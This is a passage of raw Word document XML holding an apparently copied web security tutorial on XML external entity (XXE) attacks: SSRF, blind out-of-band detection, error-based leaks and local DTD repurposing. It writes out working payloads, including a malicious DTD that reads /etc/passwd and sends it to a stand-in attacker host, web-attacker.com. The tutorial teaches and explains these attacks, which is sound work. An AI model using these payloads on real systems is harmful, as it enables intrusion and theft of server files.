          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>SSRF attack</w:t>
      </w:r>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, you need to define an external XML entity using the URL that you want to target, and use the defined entity within a data value. If you can use the defined entity within a data value that is returned in the application's response, then you will be able to view the response from the URL within the application's response, and so gain two-way interaction with the back-end system. If not, then you will only be able to perform </w:t>
      </w:r>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>blind SSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> attacks (which can still have critical consequences).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB1F013"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In the following XXE example, the external entity will cause the server to make a back-end HTTP request to an internal system within the organization's infrastructure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E53CF43" w14:textId="77777777" w:rsidR="00B20233" w:rsidRDefault="00B20233" w:rsidP="00B20233">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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lastRenderedPageBreak/>
        <w:t xml:space="preserve">&lt;!DOCTYPE foo [ &lt;!ENTITY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 xml:space="preserve"> SYSTEM "http://internal.vulnerable-website.com/"</w:t>
      </w:r>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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2010F9AF" w14:textId="77777777" w:rsidR="00087CDF" w:rsidRPr="00B20233" w:rsidRDefault="00087CDF" w:rsidP="00B20233">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="680DA497"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Blind XXE vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7021E0"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Many instances of XXE vulnerabilities are blind. This means that the application does not return the values of any defined external entities in its responses, and so direct retrieval of server-side files is not possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED0733A"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Blind XXE vulnerabilities can still be detected and exploited, but more advanced techniques are required. You can sometimes use out-of-band techniques to find vulnerabilities and exploit them to exfiltrate data. And you can sometimes trigger XML parsing errors that lead to disclosure of sensitive data within error messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66ED37F1"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What is blind XXE?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35880619"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Blind XXE vulnerabilities arise where the application is vulnerable to XXE injection but does not return the values of any defined external entities within its responses. This means that direct retrieval of server-side files is not possible, and so blind XXE is generally harder to exploit than regular XXE vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5EB5FD"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There are two broad ways in which you can find and exploit blind XXE vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52787AA2" w14:textId="77777777" w:rsidR="00087CDF" w:rsidRPr="00087CDF" w:rsidRDefault="00087CDF" w:rsidP="00087CDF">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You can trigger out-of-band network interactions, sometimes exfiltrating sensitive data within the interaction data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73057CE1" w14:textId="77777777" w:rsidR="00087CDF" w:rsidRPr="00087CDF" w:rsidRDefault="00087CDF" w:rsidP="00087CDF">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You can trigger XML parsing errors in such a way that the error messages contain sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6719BBAA" w14:textId="77777777" w:rsidR="002E4BAD" w:rsidRDefault="002E4BAD"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0CCCBEF" w14:textId="77777777" w:rsidR="002E4BAD" w:rsidRDefault="002E4BAD"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494B063" w14:textId="61414A50"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lastRenderedPageBreak/>
        <w:t>Detecting blind XXE using out-of-band (OAST) techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473F8820"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can often detect blind XXE using the same technique as for </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:anchor="exploiting-xxe-to-perform-ssrf-attacks" w:history="1">
        <w:r w:rsidRPr="00087CDF">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-IN"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>XXE SSRF attacks</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> but triggering the out-of-band network interaction to a system that you control. For example, you would define an external entity as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B561C5F"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"http://f2g9j7hhkax.web-attacker.com"</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&gt;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618B66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would then make use of the defined entity in a data value within the XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDB4AA0"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attack causes the server to make a back-end HTTP request to the specified URL. The attacker can monitor for the resulting DNS lookup and HTTP request, and thereby detect that the XXE attack was successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0137A8" w14:textId="77777777" w:rsidR="00087CDF" w:rsidRDefault="00087CDF" w:rsidP="00087CDF">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9622C3" w14:textId="3AC32222"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Sometimes, XXE attacks using regular entities are blocked, due to some input validation by the application or some hardening of the XML parser that is being used. In this situation, you might be able to use XML parameter entities instead. XML parameter entities are a special kind of XML entity which can only be referenced elsewhere within the DTD. For present purposes, you only need to know two things. First, the declaration of an XML parameter entity includes the percent character before the entity name:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C03EFA"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myparameterentity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"my parameter entity value" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223CAFC6"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And second, parameter entities are referenced using the percent character instead of the usual ampersand:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D300631"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myparameterentity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066A2F51"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This means that you can test for blind XXE using out-of-band detection via XML parameter entities as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A5DBA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 &lt;!ENTITY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"http://f2g9j7hhkax.web-attacker.com"&gt;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 ]</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1FE8ED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payload declares an XML parameter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xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> and then uses the entity within the DTD. This will cause a DNS lookup and HTTP request to the attacker's domain, verifying that the attack was successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154B364F" w14:textId="77777777" w:rsidR="00087CDF" w:rsidRDefault="00087CDF" w:rsidP="00087CD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7E45D2E" w14:textId="28C128E9"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Exploiting blind XXE to exfiltrate data out-of-band</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED77BA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Detecting a blind XXE vulnerability via out-of-band techniques is all very well, but it doesn't actually demonstrate how the vulnerability could be exploited. What an attacker really wants to achieve is to exfiltrate sensitive data. This can be achieved via a blind XXE vulnerability, but it involves the attacker hosting a malicious DTD on a system that they control, and then invoking the external DTD from within the in-band XXE payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAEF275"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 example of a malicious DTD to exfiltrate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is as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71984F0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file SYSTEM "file:///etc/passwd"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1D18F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eval "&lt;!ENTITY &amp;#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26545A2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%eval;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D148070"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%exfiltrate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6690077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DTD carries out the following steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7BB567"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2AEB0158"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containing a dynamic declaration of another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xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>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will be evaluated by making an HTTP request to the attacker's web server containing the value of the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entity within the URL query string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149F470B" w14:textId="77777777" w:rsidR="00087CDF" w:rsidRPr="00087CDF" w:rsidRDefault="00087CDF" w:rsidP="00087CDF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>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entity, which causes the dynamic declaration of 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to be performed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D751BB5" w14:textId="77777777" w:rsidR="00087CDF" w:rsidRPr="00087CDF" w:rsidRDefault="00087CDF" w:rsidP="00087CDF">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exfiltrate</w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> entity, so that its value is evaluated by requesting the specified URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B4B6C2"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attacker must then host the malicious DTD on a system that they control, normally by loading it onto their own webserver. For example, the attacker might serve the malicious DTD at the following URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD41FAC"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http://web-attacker.com/malicious.dtd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CFD23D"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Finally, the attacker must submit the following XXE payload to the vulnerable application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC1565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&lt;!DOCTYPE foo [&lt;!ENTITY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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361900F9"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"http://web-attacker.com/malicious.dtd"&gt;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xxe</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784715FD"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XXE payload declares an XML parameter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xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> and then uses the entity within the DTD. This will cause the XML parser to fetch the external DTD from the attacker's server and interpret it inline. The steps defined within the malicious DTD are then executed, and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is transmitted to the attacker's server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A237A54" w14:textId="77777777" w:rsidR="00087CDF" w:rsidRPr="00087CDF" w:rsidRDefault="00087CDF" w:rsidP="00087CDF">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087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E18C641" w14:textId="77777777" w:rsidR="00087CDF" w:rsidRPr="00087CDF" w:rsidRDefault="00087CDF" w:rsidP="00087CDF">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This technique might not work with some file contents, including the newline characters contained in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xml:space="preserve"> file. This is because some XML parsers fetch the URL in the external entity definition using an API that validates the characters that are allowed to appear within the URL. In this situation, it might be possible to use the FTP protocol instead of HTTP. Sometimes, it will not be possible to exfiltrate data containing </w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>newline characters, and so a file such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/etc/hostname</w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> can be targeted instead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650169EB" w14:textId="77777777"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Exploiting blind XXE to retrieve data via error messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0249572F"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An alternative approach to exploiting blind XXE is to trigger an XML parsing error where the error message contains the sensitive data that you wish to retrieve. This will be effective if the application returns the resulting error message within its response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A24E63"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You can trigger an XML parsing error message containing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using a malicious external DTD as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A5FB2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file SYSTEM "file:///etc/passwd"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A16AD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 eval "&lt;!ENTITY &amp;#x25; error SYSTEM 'file:///nonexistent/%file;'&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8DED7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%eval;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDAC869"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%error;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13476579"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DTD carries out the following steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350C9A37"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3F84FFDB"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containing a dynamic declaration of another XML parameter entity called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xml:space="preserve"> entity will be evaluated by loading a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whose name contains the value of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> entity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C584029"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eval</w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> entity, which causes the dynamic declaration of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entity to be performed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A2494D" w14:textId="77777777" w:rsidR="00087CDF" w:rsidRPr="00087CDF" w:rsidRDefault="00087CDF" w:rsidP="00087CDF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>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r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> entity, so that its value is evaluated by attempting to load the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resulting in an error message containing the name of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>nonexistent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> file, which is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3CE2D1BC"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lastRenderedPageBreak/>
        <w:t>Invoking the malicious external DTD will result in an error message like the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6494ED11"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java.io.FileNotFoundException</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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nonexistent</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/root:x:0:0:root:/root:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405781DD"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daemon:</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x:1:1</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:daemon:/</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781DC935"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bin:</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x:2:2</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:bin:/bin:/</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usr</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sbin</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nologin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="29BCF2DD"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
    <w:p w14:paraId="44CA4E21" w14:textId="77777777" w:rsidR="00C02782" w:rsidRDefault="00C02782" w:rsidP="00087CDF">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5CFD40B" w14:textId="77CE6A20" w:rsidR="00087CDF" w:rsidRPr="00087CDF" w:rsidRDefault="00087CDF" w:rsidP="00087CDF">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="150" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Exploiting blind XXE by repurposing a local DTD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010685B6"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The preceding technique works fine with an external DTD, but it won't normally work with an internal DTD that is fully specified within the </w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>DOCTYPE</w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> element. This is because the technique involves using an XML parameter entity within the definition of another parameter entity. Per the XML specification, this is permitted in external DTDs but not in internal DTDs. (Some parsers might tolerate it, but many do not.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7244572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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> what about blind XXE vulnerabilities when out-of-band interactions are blocked? You can't exfiltrate data via an out-of-band connection, and you can't load an external DTD from a remote server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D1652A"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In this situation, it might still be possible to trigger error messages containing sensitive data, due to a loophole in the XML language specification. If a document's DTD uses a hybrid of internal and external DTD declarations, then the internal DTD can redefine entities that are declared in the external DTD. When this happens, the restriction on using an XML parameter entity within the definition of another parameter entity is relaxed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7622DF63"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means that an attacker can employ the </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:anchor="exploiting-blind-xxe-to-retrieve-data-via-error-messages" w:history="1">
        <w:r w:rsidRPr="00087CDF">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-IN"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>error-based XXE</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> technique from within an internal DTD, provided the XML parameter entity that they use is redefining an entity that is declared within an external DTD. Of </w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">course, if out-of-band connections are blocked, then the external DTD cannot be loaded from a remote location. Instead, it needs to be an external DTD file that is local to the application server. Essentially, the attack involves invoking a DTD file that happens to exist on the local filesystem and repurposing it to redefine an existing entity in a way that triggers a parsing error containing sensitive data. This technique was pioneered by Arseniy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Sharoglazov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, and ranked #7 in our </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:anchor="7" w:history="1">
        <w:r w:rsidRPr="00087CDF">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-IN"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>top 10 web hacking techniques of 2018</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E0BEB8" w14:textId="77777777" w:rsidR="00087CDF" w:rsidRPr="00087CDF" w:rsidRDefault="00087CDF" w:rsidP="00087CDF">
      <w:pPr>
        <w:spacing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For example, suppose there is a DTD file on the server filesystem at the location </w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
